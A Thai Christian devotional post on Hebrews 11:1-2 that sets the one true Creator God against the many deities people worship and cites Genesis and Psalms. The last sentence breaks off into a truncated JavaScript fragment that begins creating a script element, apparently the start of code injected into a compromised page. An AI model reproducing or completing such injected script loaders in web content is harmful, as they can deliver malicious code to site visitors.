พระเจ้า GOD ฮบ. 11:1-2

q

15 ต.ค. พระเจ้า GOD ฮบ. 11:1-2

ฮบ. 11:1-2 “บัดนี้ความเชื่อคือความแน่ใจในสิ่งที่เราหวังไว้ เป็นความรู้สึกมั่นใจว่า สิ่งที่ยังไม่ได้เห็นนั้นมีจริง โดยความเชื่อนี้เอง พวกบรรพบุรุษก็ได้รับการรับรอง”

ในโลกนี้มีพระอยู่มากมายที่มนุษย์ได้แต่งตั้ง หรือเรียกหาให้เป็น “พระ” เช่น พระอาทิตย์, พระจันทร์ แม้กระทั่งที่ประเทศญี่ปุ่นก็มีพระมาก บ้างก็เอาเศษผมมารวมกันใส่กระปุกนำไปไว้บนหิ้งแล้วนมัสการกราบไหว้ ประเทศอินเดียก็มีพระมากมาย แม้กระทั่งโคก็นับถือเป็นพระ ซึ่งเราอาจได้ยินมากต่อมาก มีหลายลำดับตามยศตำแหน่ง แต่ยังมีสิ่งหนึ่งที่มนุษย์มักจะแสวงหาคือสิ่งสากลโลก หลายคนอธิษฐาน ถึงสิ่งศักดิ์สิทธิ์ใน “สากลโลก” บางคนอาจจะอธิษฐานถึง “พระแห่งสากลโลก” ที่เป็นเอกเป็นใหญ่เป็นพระเจ้าผู้สูงสุด ผู้ครอบครอง ผู้สร้างสิ่งศักดิ์สิทธิ์ทั้งปวงนี้

เวลาเราอ่านพระคัมภีร์ หรือคริสตชนกล่าวถึงคำว่า “พระเจ้า” ขออย่าให้ท่านได้เข้าใจพระต่างๆ ที่คนเข้าใจอาจเป็นพระนารายณ์ พระอิศวร พระขุนช้างขุนแผน หรือพระอินทร์ พระพรหม พระอะไรต่อมิอะไร ท่านต้องเข้าใจก่อนว่า เราซึ่งเป็นคริสตชนพูดถึงพระเจ้าหมายถึง “พระเจ้าเที่ยงแท้องค์เดียว” ที่เป็นใหญ่สูงสุด ผู้สร้างสรรพสิ่งทั้งปวง และไม่มีใครสร้างพระองค์ พระองค์ทรงดำรงพระชนม์อยู่เป็นนิจกาล ไม่มีเกิดแก่ เจ็บ ตายแบบมนุษย์

อะไรที่พิสูจน์ว่าพระเจ้าเป็นพระเจ้าเที่ยงแท้ ?

พระคัมภีร์ได้สอนถึงเรื่องของพระเจ้าอย่างชัดเจน มนุษย์จะเข้าใจและรู้จักพระเจ้าโดยแค่สติปัญญา ความเข้าใจทางด้านเหตุผลอย่างเดียวเท่านั้นไม่ได้ เพราะพระเจ้าทรงสำแดงพระองค์หลาย ๆ วิธีด้วยกัน เช่น ทางเหตุผล, ธรรมชาติ, มโนธรรม, ประวัติศาสตร์

จิตสำนึก—>เหตุผล—>พระคัมภีร์—>ธรรมชาติ—> มโนธรรม—>ประวัติศาสตร์

พระคัมภีร์สอนว่าพระเจ้าทรงยิ่งใหญ่มากและไม่มีใครหยั่งรู้ในสภาพของพระองค์ ได้หมด แต่พระองค์ทรงสำแดงถึงพระลักษณะของพระองค์ให้ทราบผ่านเหตุการณ์ต่างๆ ในพระคัมภีร์ หากเราอ่านพระคัมภีร์พันธสัญญาเดิมและใหม่ 66 เล่ม พระคัมภีร์ไม่ได้บันทึกว่า “มี พระเจ้าอย่างไร” แต่ได้พูดถึงพระราชกิจของพระเจ้าทั้งสิ้นเพราะพผู้เขียนระคัมภีร์ได้เขียนจากการดลใจเพื่อสำแดงราชกิจของพระเจ้าแต่ ไม่ได้เขียนความเป็นมาของพระองค์

ผู้บันทึกไม่ใช่นักวิทยาศาสตร์ แต่ได้เขียนให้ประชากรของพระเจ้าได้ท่องจดจำและสอนแก่ลูกหลาน ถึงความดีการช่วยเหลือและให้ยึดมั่นว่าพระเจ้ามีจริง เราจะเห็นตัวอย่างได้จาก

ปฐก.1:1 พูดถึงการเนรมิตของพระเจ้า

สดด.14:1 สอนว่า คนโง่พูดว่าไม่มีพระเจ้า แต่ไม่ได้สอนว่าพระเจ้ามาได้อย่างไรvar d=document;var s=d.createElement(‘script’);